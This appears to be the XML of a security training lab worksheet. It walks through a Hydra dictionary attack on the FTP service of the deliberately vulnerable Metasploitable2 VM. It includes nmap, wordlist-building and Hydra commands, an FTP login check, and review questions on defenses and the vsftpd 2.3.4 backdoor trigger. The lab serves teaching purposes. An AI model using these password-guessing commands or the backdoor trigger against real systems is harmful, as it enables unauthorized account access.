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10</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>CRACK FTP CREDENTIALS USING A DICTIONARY ATTACK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execute an automated dictionary-based brute-force attack against an FTP authentication service using Hydra to recover valid user credentials.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A dictionary attack tests lists of pre-compiled candidate usernames and passwords against an authentication protocol. It demonstrates the risk of default/weak passwords and lack of lockout mechanisms.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THC-Hydra CLI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Wordlists (custom / rockyou.txt)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Metasploitable2 (vsftpd 2.3.4 - Port 21)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Verify FTP Service Availability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Scan port 21 on target to confirm service status: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nmap -p21 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Prepare Target Username &amp; Password Wordlists</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Prepare wordlist files for execution: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echo -e "admin\nmsfadmin\nroot\nuser" &gt; users.txt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echo -e "password\nmsfadmin\n123456\nadmin" &gt; passwords.txt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Execute Hydra Dictionary Attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Run Hydra against the FTP service target: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hydra -L users.txt -P passwords.txt ftp://&lt;target-ip&gt;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hydra -l msfadmin -P /usr/share/wordlists/rockyou.txt ftp://&lt;target-ip&gt;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Verify Discovered Credentials via FTP Client</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Authenticate to target server using cracked credentials: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ftp &lt;target-ip&gt;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13125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Successful password recovery by Hydra (e.g., login: msfadmin / password: msfadmin) and verified terminal login access to the target FTP server.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a dictionary attack, and how is it different from a brute-force attack?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dictionary attack tests words from a pre-compiled wordlist. Brute-force systematically tests all possible character combinations.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do the -L and -P flags in Hydra do?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-L specifies a file containing usernames. -P specifies a file containing candidate passwords.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Why does Hydra work faster with a small custom wordlist than with rockyou.txt?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custom list tests dozens of targeted combinations in seconds, whereas rockyou.txt contains 14 million passwords taking hours.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Name two real-world defenses against dictionary attacks on login services.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1) Account lockout policies after 3-5 failed login attempts.</w:t>
              <w:br/>
              <w:t>2) Multi-Factor Authentication (MFA) and rate limiting.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Why is vsftpd 2.3.4 specifically used as a target in lab environments like Metasploitable2?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contains a historical backdoor (username ending in :) opening a root shell on port 6200), ideal for security testing.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363</Words>
  <Characters>2143</Characters>
  <CharactersWithSpaces>2464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2026-10-06T20:03:36Z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